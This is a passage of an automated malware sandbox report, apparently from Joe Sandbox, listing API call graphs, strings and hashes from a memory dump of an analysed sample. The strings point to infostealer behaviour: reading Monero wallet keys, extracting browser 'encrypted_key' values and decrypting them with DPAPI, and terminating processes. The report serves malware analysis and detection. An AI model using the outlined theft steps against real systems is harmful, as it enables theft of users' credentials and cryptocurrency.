                  • Instruction Fuzzy Hash: 838154729111089BDB04FBA0DD96EEE7338AF15310F544129F407B60D1EF346A8AFBA2
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C21580,00C20D92), ref: 00C0F54C
                  • lstrlen.KERNEL32(00000000), ref: 00C0F56B
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 594843bc006cdb749ade052f96298e7d2b4024cd862b90c6d6c38a5c38c1015f
                  • Instruction ID: e63266dd368212c9ccb94701e795f7dff5fab29020ea9f0a1f64f214824b4c34
                  • Opcode Fuzzy Hash: 594843bc006cdb749ade052f96298e7d2b4024cd862b90c6d6c38a5c38c1015f
                  • Instruction Fuzzy Hash: FE512371D111089ADB04FBB0DD96DED7338AF55310F448528F816A71D1EE34AB8AFBA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: a0517bef4c80abafd39480c0111340bce6dce657ac43efaf6309512888c7c9cf
                  • Instruction ID: 4a6a30a9f7fbf79653691d2291fff3c4d2b8680f1e80635e63faff3decf0ed81
                  • Opcode Fuzzy Hash: a0517bef4c80abafd39480c0111340bce6dce657ac43efaf6309512888c7c9cf
                  • Instruction Fuzzy Hash: 004182B1D10108AFCB04EFE5D945AEEB774BF55314F108028F41677291DB34AA46EFA2
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C09D39
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09AEF
                    • Part of subcall function 00C09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C04EEE,00000000,?), ref: 00C09B01
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09B2A
                    • Part of subcall function 00C09AC0: LocalFree.KERNEL32(?,?,?,?,00C04EEE,00000000,?), ref: 00C09B3F
                    • Part of subcall function 00C09B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C09B84
                    • Part of subcall function 00C09B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C09BA3
                    • Part of subcall function 00C09B60: LocalFree.KERNEL32(?), ref: 00C09BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 440d3dfb833447f4be7cb8462fea9f4322a2650e3a52e25ad26c646f7fbda20c
                  • Instruction ID: b35c7d462ba25f97b6c79bd4d9bb9341f0c2da3ebf7da33bb4d26c7fa4de4c41
                  • Opcode Fuzzy Hash: 440d3dfb833447f4be7cb8462fea9f4322a2650e3a52e25ad26c646f7fbda20c
                  • Instruction Fuzzy Hash: 603130B5D10209ABCB14EFE4DC85BEEB7B8EF48304F144519E915A7282E7349A44CBA1
                  APIs
                  • memset.MSVCRT ref: 00C194EB
                    • Part of subcall function 00C18D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C1951E,00000000), ref: 00C18D5B
                    • Part of subcall function 00C18D50: RtlAllocateHeap.NTDLL(00000000), ref: 00C18D62
                    • Part of subcall function 00C18D50: wsprintfW.USER32 ref: 00C18D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00C195AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C195C9
                  • CloseHandle.KERNEL32(00000000), ref: 00C195D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: 62c7746ab33959b539270a53ee3e1874ff3604d85e85fef4385a05e7190cf381
                  • Instruction ID: ca86d5db6cf1c6158250f34abb1496e8e52108228bc157bc688167033d8cb23c
                  • Opcode Fuzzy Hash: 62c7746ab33959b539270a53ee3e1874ff3604d85e85fef4385a05e7190cf381
                  • Instruction Fuzzy Hash: FE315C75A4020CAFDB14DFD0CC49BEDB7B9EB49300F104559E506AB184DB74AA8AEB52
                  APIs
                  • CreateFileA.KERNEL32(00C13AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C13AEE,?), ref: 00C192FC
                  • GetFileSizeEx.KERNEL32(000000FF,00C13AEE), ref: 00C19319
                  • CloseHandle.KERNEL32(000000FF), ref: 00C19327
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: e58979a40f2776bab8ae5df6e4d56b3b5605e94e68a50c553440618dbd0e4d37
                  • Instruction ID: 7760a87cc6717948a85579c31ba9f1a6feb7b36781253d9d7671a4979d165e38
                  • Opcode Fuzzy Hash: e58979a40f2776bab8ae5df6e4d56b3b5605e94e68a50c553440618dbd0e4d37
                  • Instruction Fuzzy Hash: 00F0AF39E80208BFDB20DFB2DC18F9E77B9EB49320F50C264B621A72D0D6B497419B40
                  APIs
                  • __getptd.LIBCMT ref: 00C1C74E
                    • Part of subcall function 00C1BF9F: __amsg_exit.LIBCMT ref: 00C1BFAF
                  • __getptd.LIBCMT ref: 00C1C765
                  • __amsg_exit.LIBCMT ref: 00C1C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00C1C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 1205f85e309656e9e05f91f8a7eae5f8c0f80a815f63e1d2f7a4e93538f4f2a2
                  • Instruction ID: 763031ac670cbe1bd0544f59df4296fe515c7b37f6710fac09d12b0f5c88838e
                  • Opcode Fuzzy Hash: 1205f85e309656e9e05f91f8a7eae5f8c0f80a815f63e1d2f7a4e93538f4f2a2
                  • Instruction Fuzzy Hash: E7F0B432981710DFD720BBF858877DD33A06F02720F244149F414A62D2CBA45DD2BF96
                  APIs
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14F7A
                  • lstrcat.KERNEL32(?,00C21070), ref: 00C14F97
                  • lstrcat.KERNEL32(?,017992D0), ref: 00C14FAB
                  • lstrcat.KERNEL32(?,00C21074), ref: 00C14FBD
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C1492C
                    • Part of subcall function 00C14910: FindFirstFileA.KERNEL32(?,?), ref: 00C14943
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FDC), ref: 00C14971
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FE0), ref: 00C14987
                    • Part of subcall function 00C14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C14B7D
                    • Part of subcall function 00C14910: FindClose.KERNEL32(000000FF), ref: 00C14B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 085a603e7d44af0319d7efa4ed16d6e71cf965a2011c450aeb4891d96c3b4335
                  • Instruction ID: ffbf921f82757780be340021ab8af5f22a795be316b5542b0f4ae414b175dc5c
                  • Opcode Fuzzy Hash: 085a603e7d44af0319d7efa4ed16d6e71cf965a2011c450aeb4891d96c3b4335
                  • Instruction Fuzzy Hash: 96210D7A940204ABC754FBB0EC46EED333CAB56700F044564B649660C1EE7496CDDB92